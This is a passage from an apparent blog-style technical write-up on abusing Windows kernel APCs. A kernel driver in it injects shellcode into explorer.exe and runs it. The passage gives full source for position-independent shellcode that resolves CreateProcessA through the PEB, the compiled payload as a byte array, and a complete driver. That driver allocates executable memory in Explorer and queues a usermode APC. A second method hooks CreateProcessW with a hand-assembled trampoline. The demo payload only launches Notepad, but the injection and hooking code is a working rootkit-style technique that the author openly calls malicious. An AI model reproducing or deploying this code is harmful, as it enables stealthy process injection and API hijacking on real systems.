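{
    std::string name;
    ApcEnvironment stateIndex;  // plays the role of KAPC.ApcStateIndex
    ApcMode mode;               // plays the role of KAPC.ApcMode
    bool inserted;              // plays the role of KAPC.Inserted
};

struct ModelApcState
{
    // One queue per mode: [KernelMode] and [UserMode].
    std::array<std::list<ModelApc*>, 2> apcListHead;
    bool kernelApcPending = false;
};

struct ModelThread
{
    std::array<ModelApcState, 2> apcStates;  // indexed like ApcStatePointer
    bool apcQueueable = true;
};

// Pick the KAPC_STATE by environment, then the list by mode.
bool InsertQueueApc(ModelThread& thread, ModelApc& apc)
{
    if (!thread.apcQueueable || apc.inserted)
        return false;

    ModelApcState& state = thread.apcStates[apc.stateIndex];
    state.apcListHead[apc.mode].push_back(&apc);
    apc.inserted = true;

    if (apc.mode == KernelMode)
        state.kernelApcPending = true;
    return true;
}
```

In this model, queuing a usermode APC for the original environment ends up in apcStates[0].apcListHead[UserMode], and queuing the same APC a second time is rejected because it is already marked as inserted.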

3)
Since there is no directly available API to create a process from kernel mode, I decided to leverage APCs to run malicious usermode code in a particular process. I devised three different ways to achieve this goal and, although all of them rely on APCs, their approach changes considerably.
The general strategy involves some preliminary operations to locate the target process, obtain its handle and allocate some memory in its process address space. The malicious code is then copied in this memory area (injection) and an APC is initialized in either one of these ways:
  1. Usermode APC with the normal routine set to the allocated area, that contains the malicious code.
  2. Kernelmode APC with the kernel routine set to hook a user-mode API. In this case, the allocated area contains the assembly code of the hook, that will be executed only once, in the context of the target process.
  3. Kernelmode APC with the kernel routine set to overwrite an empty entry in the kernel-to-usermode callback table with the address of the allocated area, and let KeUserModeCallback call it. The allocated area contains the malicious code.
There are of course many other methods to start a process from kernelmode code. For example, a possible variant of the second method that doesn't involve APCs would consist of using PsSetCreateProcessNotifyRoutine in order to inject the malicious code in every process that is created, and then hooking a common API to redirect its execution towards the malicious code. However, here I chose to focus solely on the three ideas mentioned above.

Method 1
For the first method, I used the APCs in the most natural way: I queued a usermode APC to Explorer that simply runs a "shellcode", which in turn locates and calls the CreateProcess API to execute Notepad.

First of all, I needed to have the usermode shellcode, thus I wrote the following usermode application:
 #include <stdio.h>  
 #include <intrin.h>  
 #include <windows.h>  
   
 typedef BOOL (*PCREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,  
  LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,  
  LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);  
     
 void main(void)  
 {  
      unsigned __int64 ptrPEB;  
      unsigned __int64 ptrPEB_LDR_DATA;  
      unsigned __int64 ptrInLoadOrderModuleList;  
      unsigned __int64 DllBase;  
      unsigned int *pNames, *pAddresses;  
      PCREATEPROCESS pCreateProcess;  
      wchar_t *DllPath;  
      char app_notepad[12];  
      STARTUPINFO si;  
      PROCESS_INFORMATION pi;  
   
      app_notepad[0] = 'n';  
      app_notepad[1] = 'o';  
      app_notepad[2] = 't';  
      app_notepad[3] = 'e';  
      app_notepad[4] = 'p';  
      app_notepad[5] = 'a';  
      app_notepad[6] = 'd';  
      app_notepad[7] = '.';  
      app_notepad[8] = 'e';  
      app_notepad[9] = 'x';  
      app_notepad[10] = 'e';  
      app_notepad[11] = 0;  
   
      //memset(&si, 0, sizeof(si));  
      for(int j = 0; j < sizeof(si); j++)  
      {  
           ((char *)&si)[j] = 0;  
      }  
      si.cb = sizeof(si);  
      //memset(&pi, 0, sizeof(pi));  
      for(int j = 0; j < sizeof(pi); j++)  
      {  
           ((char *)&pi)[j] = 0;  
      }  
   
      IMAGE_DOS_HEADER *pMZ;   
      IMAGE_NT_HEADERS *pPE;   
      IMAGE_EXPORT_DIRECTORY *pExpDir;   
      CHAR *currentName;  
   
      ptrPEB = __readgsqword(0x60);  
      ptrPEB_LDR_DATA = *(unsigned __int64 *)(ptrPEB + 0x18);  
      ptrInLoadOrderModuleList = *((unsigned __int64 *)(ptrPEB_LDR_DATA + 0x10));  
   
      DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);  
      DllPath += 0x14;     // skip "C:\windows\system32\"  
   
      while(true)  
      {  
           // 6b 00 65 00 72 00 6e 00 - 65 00 6c 00 33 00 32 00 - 2e 00 64 00 6c 00 6c 00  
   
           if( ((unsigned __int64 *)DllPath)[0] == 0x006e00720065006b &&  
                ((unsigned __int64 *)DllPath)[1] == 0x00320033006c0065 &&  
                ((unsigned __int64 *)DllPath)[2] == 0x006c006c0064002e )  
           {  
                break;  
           }  
   
           ptrInLoadOrderModuleList = *((unsigned __int64 *)ptrInLoadOrderModuleList);  
           DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);  
           DllPath += 0x14;     // skip "C:\windows\system32\"  
      }  
   
      DllBase = *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x30);  
   
      pMZ = (IMAGE_DOS_HEADER*)DllBase;   
      pPE = (IMAGE_NT_HEADERS*)(DllBase + pMZ->e_lfanew);   
      pExpDir = (IMAGE_EXPORT_DIRECTORY*)(DllBase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);   
     
      pNames = (unsigned int *)(DllBase + pExpDir->AddressOfNames);   
      pAddresses = (unsigned int *)(DllBase + pExpDir->AddressOfFunctions);   
      for(unsigned int i = 0; i < pExpDir->NumberOfNames; i++)   
      {   
           currentName = (CHAR*)(DllBase + pNames[i]);   
   
           //43 72 - 65 61 - 74 65 - 50 72 - 6f 63 - 65 73 - 73 41  
   
           if( ((unsigned __int64 *) currentName)[0] == 0x7250657461657243 &&  
                ((unsigned __int32 *) currentName)[2] == 0x7365636f &&  
                ((unsigned short *) currentName)[6] == 0x4173 )  
           {  
                pCreateProcess = (PCREATEPROCESS)(DllBase + pAddresses[i]);  
                break;  
           }  
      }   
   
      pCreateProcess(NULL, (LPTSTR)app_notepad, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);  
 }  

This code purposely avoids the use of any API or CRT function in order to be relocatable. As a result, after compiling it, I was able to simply copy all the opcodes generated for the "main" function and use them as an executable buffer that gets injected into a running process.
The shellcode behaves similarly to the ones you can find in exploits: it accesses the PEB to get the PEB_LDR_DATA and its InLoadOrderModuleList field, which is a pointer to a list of LDR_DATA_TABLE_ENTRY structures, each representing a loaded module. The code walks the list to locate kernel32.dll (the DLL name is kept in LDR_DATA_TABLE_ENTRY.FullDllName) and, once found, it retrieves its imagebase via LDR_DATA_TABLE_ENTRY.DllBase. It is then straightforward to parse the PE header of the DLL in order to locate its export table, and from it the address of the CreateProcessA API. The shellcode concludes by calling that API to launch Notepad.
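The 64-bit constants that the listing compares against are simply the characters of the names as a little-endian CPU reads them, eight bytes at a time. The following is a minimal sketch of that arithmetic, not part of the original code; the helper names pack_utf16le4 and pack_ascii are hypothetical and exist only for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Pack four ASCII characters as UTF-16LE code units into one 64-bit value,
   i.e. what a little-endian CPU sees when it loads 8 bytes of a wide string.
   (Hypothetical helper, for illustration only.) */
uint64_t pack_utf16le4(const char *s)
{
    uint64_t v = 0;
    assert(s != NULL);
    for (size_t i = 0; i < 4; i++) {
        /* each character occupies 16 bits; the high byte is zero for ASCII */
        v |= (uint64_t)(unsigned char)s[i] << (16 * i);
    }
    return v;
}

/* Pack the first n (at most 8) ASCII bytes of s into a little-endian integer.
   (Hypothetical helper, for illustration only.) */
uint64_t pack_ascii(const char *s, size_t n)
{
    uint64_t v = 0;
    assert(s != NULL && n <= 8);
    for (size_t i = 0; i < n; i++) {
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    }
    return v;
}
```

With these helpers, pack_utf16le4("kern"), pack_utf16le4("el32") and pack_utf16le4(".dll") give the three values used in the module-name check, while pack_ascii("CreatePr", 8), pack_ascii("oces", 4) and pack_ascii("sA", 2) give the three values used in the export-name check. Note that the comparison is case sensitive and relies on the path prefix being exactly 0x14 characters long, as the comments in the listing point out.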

Having the shellcode sorted out, let's see the code for the kernelmode driver (note that the shellcode is encoded in the "buffer[]" array):
 #include <Ntifs.h>  
 #include <string.h>  
   
 char buffer[] = {  
 0x48, 0x81, 0xEC, 0x68, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0x6E, 0xC6,  
 0x84, 0x24, 0x39, 0x01, 0x00, 0x00, 0x6F, 0xC6, 0x84, 0x24, 0x3A, 0x01, 0x00, 0x00, 0x74, 0xC6,  
 0x84, 0x24, 0x3B, 0x01, 0x00, 0x00, 0x65, 0xC6, 0x84, 0x24, 0x3C, 0x01, 0x00, 0x00, 0x70, 0xC6,  
 0x84, 0x24, 0x3D, 0x01, 0x00, 0x00, 0x61, 0xC6, 0x84, 0x24, 0x3E, 0x01, 0x00, 0x00, 0x64, 0xC6,  
 0x84, 0x24, 0x3F, 0x01, 0x00, 0x00, 0x2E, 0xC6, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x41, 0x01, 0x00, 0x00, 0x78, 0xC6, 0x84, 0x24, 0x42, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x43, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x50, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x68,  
 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x04, 0xC0, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0xD0, 0xC7, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC7,  
 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x54,  
 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24,  
 0x54, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x18, 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x54, 0x01,  
 0x00, 0x00, 0xC6, 0x84, 0x04, 0x80, 0x00, 0x00, 0x00, 0x00, 0xEB, 0xD0, 0x65, 0x48, 0x8B, 0x04,  
 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x84, 0x24, 0x48, 0x01, 0x00,  
 0x00, 0x48, 0x8B, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x84,  
 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40,  
 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48,  
 0x89, 0x44, 0x24, 0x50, 0x33, 0xC0, 0x83, 0xF8, 0x01, 0x74, 0x74, 0x48, 0x8B, 0x44, 0x24, 0x50,  
 0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x48, 0x39, 0x08, 0x75, 0x2C, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x48, 0x39,  
 0x48, 0x08, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x2E, 0x00, 0x64, 0x00, 0x6C,  
 0x00, 0x6C, 0x00, 0x48, 0x39, 0x48, 0x10, 0x75, 0x02, 0xEB, 0x34, 0x48, 0x8B, 0x84, 0x24, 0x98,  
 0x00, 0x00, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48, 0x89, 0x44, 0x24, 0x50, 0xEB, 0x85, 0x48,  
 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x89, 0x44, 0x24, 0x68,  
 0x48, 0x8B, 0x44, 0x24, 0x68, 0x48, 0x89, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03,  
 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x78, 0x48, 0x8B, 0x44, 0x24, 0x78, 0x8B, 0x80,  
 0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,  
 0x89, 0x44, 0x24, 0x70, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x20, 0x48, 0x8B, 0x4C, 0x24,  
 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48,  
 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x1C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48,  
 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x60, 0xC7, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x58, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x18, 0x39, 0x84, 0x24, 0x58,  
 0x01, 0x00, 0x00, 0x0F, 0x83, 0x86, 0x00, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68,  
 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,  
 0x48, 0x39, 0x08, 0x75, 0x45, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x81, 0x78, 0x08,  
 0x6F, 0x63, 0x65, 0x73, 0x75, 0x34, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x0F, 0xB7,  
 0x40, 0x0C, 0x3D, 0x73, 0x41, 0x00, 0x00, 0x75, 0x21, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x4C, 0x24, 0x60, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8,  
 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x58, 0xEB, 0x05, 0xE9, 0x55, 0xFF, 0xFF, 0xFF, 0x48,  
 0x8D, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x84, 0x24,  
 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00, 0x00,  
 0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,  
 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x45, 0x33,  
 0xC0, 0x48, 0x8D, 0x94, 0x24, 0x38, 0x01, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x54, 0x24, 0x58, 0x33,  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xC3  
 };  
   
 typedef enum _KAPC_ENVIRONMENT  
 {  
      OriginalApcEnvironment,  
      AttachedApcEnvironment,  
      CurrentApcEnvironment,  
      InsertApcEnvironment  
 } KAPC_ENVIRONMENT, *PKAPC_ENVIRONMENT;  
   
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   
      PVOID *SystemArgument2 )   
 {  
      DbgPrint("APC kernel routine\n");  
      ExFreePool(Apc);  
 }  
   
 VOID MyUnload(PDRIVER_OBJECT DriverObject)  
 {  
      DbgPrint("Unload routine\n");  
 }  
   
 NTSTATUS  
 DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      PEPROCESS p_proc;  
      LIST_ENTRY *lentry;  
      LIST_ENTRY *le;  
      char * pImgFNam;  
      HANDLE pid;  
      BOOLEAN check = FALSE;  
      HANDLE ProcHandle = 0;  
      OBJECT_ATTRIBUTES ObjAttr;  
      SIZE_T region_size = 4096;  
      ULONG zero_bits = 0;  
      UNICODE_STRING apiName;  
      UCHAR *baseaddr = 0;  
      ULONG bw;  
      NTSTATUS status_code;  
      CLIENT_ID client_id;  
      PETHREAD ethreads;  
      KAPC_STATE apc_state;  
      VOID (*PKeInitializeApc) (PRKAPC Apc, PKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL, PKNORMAL_ROUTINE NormalRoutine OPTIONAL, KPROCESSOR_MODE ApcMode, PVOID NormalContext);  
      BOOLEAN (*PKeInsertQueueApc) (PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, UCHAR mode);   
      struct _KAPC *pApc;  
   
      DriverObject->DriverUnload = &MyUnload;  
      p_proc = PsGetCurrentProcess();  
      lentry = (LIST_ENTRY *) ( ((unsigned char*)p_proc) + 0x188 ); // ActiveProcessLinks : _LIST_ENTRY  
   
      for(le = lentry; le->Flink != lentry; le = le->Flink)  
      {  
           p_proc = (PEPROCESS) ( ((unsigned char*)le) - 0x188 );  
           pImgFNam = (char *)( ((unsigned char*) p_proc) + 0x2e0 );  
           if(strncmp(pImgFNam, "explorer.exe", sizeof("explorer.exe")) == 0)   
           {  
                check = TRUE;  
                break;  
           }  
      }  
   
      if(!check)  
      {  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      pid = PsGetProcessId(p_proc);  
   
      le = (LIST_ENTRY*) ( ((unsigned char *)p_proc) + 0x30); // ThreadListHead  
      ethreads = (PETHREAD) ( ((unsigned char*)(le->Flink)) - 0x2f8);  
   
      client_id.UniqueProcess = pid;  
      client_id.UniqueThread = PsGetThreadId(ethreads);  
   
      ObjAttr.Length = sizeof (OBJECT_ATTRIBUTES);  
      ObjAttr.RootDirectory = NULL;  
      ObjAttr.Attributes = OBJ_KERNEL_HANDLE;  
      ObjAttr.ObjectName = NULL;  
      ObjAttr.SecurityDescriptor = NULL;  
      ObjAttr.SecurityQualityOfService = NULL;  
   
      status_code = ZwOpenProcess(&ProcHandle, GENERIC_ALL, &ObjAttr, &client_id);  
      if(status_code != STATUS_SUCCESS)  
      {  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      status_code = ZwAllocateVirtualMemory(ProcHandle, &baseaddr, (ULONG_PTR)&zero_bits, &region_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
      if(status_code != STATUS_SUCCESS)  
      {  
           ZwClose(ProcHandle);  
           return STATUS_UNSUCCESSFUL;  
      }  
        
      KeStackAttachProcess(p_proc, &apc_state);  
      memcpy(baseaddr, buffer, sizeof(buffer));  
      KeUnstackDetachProcess(&apc_state);  
   
      RtlInitUnicodeString(&apiName, L"KeInitializeApc");  
      PKeInitializeApc = MmGetSystemRoutineAddress(&apiName);   
   
      RtlInitUnicodeString(&apiName, L"KeInsertQueueApc");  
      PKeInsertQueueApc = MmGetSystemRoutineAddress(&apiName);   
        
      pApc = ExAllocatePool(NonPagedPool, sizeof(struct _KAPC));  
      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)baseaddr, UserMode, NULL);  
        
      if(!PKeInsertQueueApc(pApc, 0, 0, 0))  
      {  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      ZwClose(ProcHandle);  
      return STATUS_SUCCESS;  
 }  

The driver begins by walking the ActiveProcessLinks from the EPROCESS structure in order to locate the EPROCESS corresponding to Explorer.exe (the target process). The code then retrieves the ThreadListHead from this EPROCESS, and takes note of the first ETHREAD of the list (it is not really important which one). Having done that, PsGetProcessId and PsGetThreadId are called to retrieve the CID of the target process/thread. The driver proceeds by allocating an executable area of memory inside the process via ZwOpenProcess/ZwAllocateVirtualMemory, where it then copies the shellcode bytes. To perform the copy, the driver needs to switch to the Explorer process context via KeStackAttachProcess/KeUnstackDetachProcess.
Finally, an APC is initialized by calling KeInitializeApc and passing to it the pointer to the allocated shellcode as the normal routine. This APC is then queued to the target thread belonging to Explorer via KeInsertQueueApc. To be precise, during the initialization the OS requires a kernel routine as well, but since we don't really need it, I specified a dummy one that simply frees the memory allocated for the KAPC structure.
At this point, the next time the target thread becomes eligible to receive usermode APCs, the APC is going to be run and the usermode shellcode will start a new process. It goes without saying that it is important to choose a thread that will actually enter an alertable wait: a usermode APC is delivered only when its target thread does so, and some processes have threads that are asleep or stuck in a non-alertable wait, so an APC queued to them may never get a chance to run. In my case I picked the first thread of the Explorer process for convenience: I noticed that this thread wakes up when you right click on the icon of a folder on the desktop, which is very handy because it allowed me to trigger the APC manually whenever I wanted.

Method 2
As an alternative, I decided to hijack the execution flow of a process towards my shellcode by harnessing kernelmode APCs. The idea is to patch an API that gets called quite often: the patch installs a jump to the shellcode at the entry point of the API, and the shellcode, in turn, executes Notepad and then resumes the original API.

The code of the DriverEntry is almost the same as in Method 1; the only difference is that this time the queued APC is kernelmode rather than usermode. The two lines that differ are the following:
      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, NULL, KernelMode, NULL);  
      if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The first one specifies that this is a kernelmode APC, while the second one passes two parameters to the kernel routine. These parameters are the pointer to the usermode shellcode and the pointer to the EPROCESS related to Explorer.
The kernelmode APC is still targeting Explorer.exe like before. Similarly to the shellcode, its kernel routine retrieves and walks the list of LDR_DATA_TABLE_ENTRY structures to locate the imagebase of kernel32.dll. Once found, the routine retrieves the address of the CreateProcessW API from the export table, and proceeds by patching it in order to jump to the shellcode. I chose CreateProcessW just because it is easy to trigger it on command (e.g. by running a process from Explorer's GUI), but the method applies equally to any other API.
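The export table lookup goes through three parallel arrays: the index of the matching name selects an entry in the name-ordinals array, and that entry in turn selects the slot in the functions array. Here is a minimal sketch of that indirection over plain in-memory arrays. The export_view type and find_export_rva function are hypothetical names of mine, and I simplified the names array to hold C strings, whereas a real PE image stores RVAs that must be added to the imagebase.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified, hypothetical view of the three export arrays. */
typedef struct {
    const char *const *names;       /* stands in for AddressOfNames        */
    const uint16_t *name_ordinals;  /* stands in for AddressOfNameOrdinals */
    const uint32_t *functions;      /* stands in for AddressOfFunctions    */
    size_t number_of_names;         /* stands in for NumberOfNames         */
} export_view;

/* Return the RVA of the export called `wanted`, or 0 if it is not present. */
uint32_t find_export_rva(const export_view *ev, const char *wanted)
{
    assert(ev != NULL && wanted != NULL);
    for (size_t i = 0; i < ev->number_of_names; i++) {
        if (strcmp(ev->names[i], wanted) == 0) {
            /* name index -> ordinal index -> function RVA */
            uint16_t ordinal_index = ev->name_ordinals[i];
            return ev->functions[ordinal_index];
        }
    }
    return 0;
}
```

The bound check on number_of_names is the main difference from the loop in the kernel routine, which keeps scanning until it finds the name. Indexing the functions array directly with the name index gives the right result only when the two arrays happen to be in the same order.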

The shellcode has also been slightly modified in that I added the following bytes:
 ...  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,  // last bytes of previous shellcode, padded with nops  
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // myflag dq 0  
 0x65, 0x48, 0xa1, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // mov rax,qword ptr gs:[40h] TEB.ClientId.UniqueProcess << entry  
 0x3d, 0x00, 0x00, 0x00, 0x00,                    // cmp   eax, <pid> (<pid> will be patched with the PID of explorer.exe)  
 0x75, 0x2d,                                      // jnz   Done  
 0x53,                                            // push  rbx  
 0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00,        // mov   rax, 0  
 0x48, 0xC7, 0xC3, 0x01, 0x00, 0x00, 0x00,        // mov   rbx, 1  
 0xF0, 0x48, 0x0F, 0xB1, 0x1D, 0xce, 0xff, 0xff, 0xff,  // lock  cmpxchg cs:myflag, rbx  
 0x5B,                                            // pop   rbx  
 0x75, 0x13,                                      // jnz   Done   (shellcode is run only once)  
 // save registers used by the shellcode routine: rax, rcx, r9, r8, rdx  
 0x41, 0x50,      // push  r8  
 0x41, 0x51,      // push  r9  
 0x50,            // push  rax  
 0x51,            // push  rcx  
 0x52,            // push  rdx  
 0xE8, 0x5F, 0xFC, 0xFF, 0xFF,       // call  shellcode (beginning of shellcode)  
 0x5a,            // pop   rdx  
 0x59,            // pop   rcx  
 0x58,            // pop   rax  
 0x41, 0x59,      // pop   r9  
 0x41, 0x58,      // pop   r8  
       //Done:  
 0x48, 0x83, 0xec, 0x68,             // sub   rsp,68h  (first two instructions of CreateProcessW)  
 0x48, 0x8b, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00,     // mov   rax,qword ptr [rsp+0B8h]  
 0xE9, 0x00, 0x00, 0x00, 0x00        // will be patched in order to jump to the rest of the original API instructions  

The JMP in the API entry point will actually transfer the execution to the third line of this block of instructions (the one marked with "entry"). This code begins by verifying that it is being run inside the Explorer process. It does so by comparing TEB.ClientId.UniqueProcess against a Pid hardcoded in the CMP instruction (fourth line). The CMP instruction currently has a Pid of zero (notice the four bytes following the 0x3d), but these bytes will be patched by the kernelmode APC routine with the value of the Pid of the Explorer process.
After this check, the code verifies that it has not already been run by examining the line containing "myflag dq 0". These eight bytes are a quadword that simply stores 0 initially, and which is updated to 1 after the "lock    cmpxchg cs:myflag, rbx" is run for the first time.
If both checks are satisfied, the code saves some registers on the stack, and calls the original code that I have described in the previous method. When the original shellcode returns, the code restores the registers saved earlier, executes the first two instructions of CreateProcessW and jumps to the third instruction of the original API. Again, the jump in the last line is followed by zeroed bytes, which means it jumps to the next instruction, but, as we will see later, the four bytes will be patched with the correct offset that will lead the execution flow right to the third instruction of CreateProcessW.
I had to save two instructions because when patching the API entry point I am writing a near JMP with a 32-bit relative offset (opcode 0xE9), which takes 5 bytes. The first instruction is only 4 bytes long, thus the patch also ends up overwriting the first byte of the following instruction. For this reason, the first two instructions (4 + 8 = 0x0C bytes) must be preserved and executed in order to restore the original execution flow.
Note that here I hardcoded the first two instructions in the shellcode, because this is a proof-of-concept. To generalize the method it is essential to use a mini-disassembler to work out how many instructions are going to be overwritten during the patch (so that they can be saved in the shellcode itself). Also note that if the very first instructions are relative jumps or calls, they cannot be simply copied, but their relative offsets must be recalculated.
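The two pieces of arithmetic involved here are easy to get wrong, so here is a minimal sketch of them as standalone functions. The names jmp_rel32 and bytes_to_preserve are hypothetical, and the instruction lengths are assumed to come from a disassembler that is not shown; this is only meant to illustrate how the offsets are computed, not how the driver does it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define JMP_REL32_LEN 5  /* one opcode byte (0xE9) plus a 32-bit displacement */

/* Compute the displacement of a near JMP located at jmp_addr so that it lands
   on target. The displacement is relative to the end of the JMP instruction.
   Returns 1 on success, 0 if the target is out of the +/-2GB range. */
int jmp_rel32(uint64_t jmp_addr, uint64_t target, int32_t *rel_out)
{
    int64_t diff;
    assert(rel_out != NULL);
    diff = (int64_t)(target - (jmp_addr + JMP_REL32_LEN));
    if (diff < INT32_MIN || diff > INT32_MAX) {
        return 0;
    }
    *rel_out = (int32_t)diff;
    return 1;
}

/* Given the lengths of the first instructions of a function, return how many
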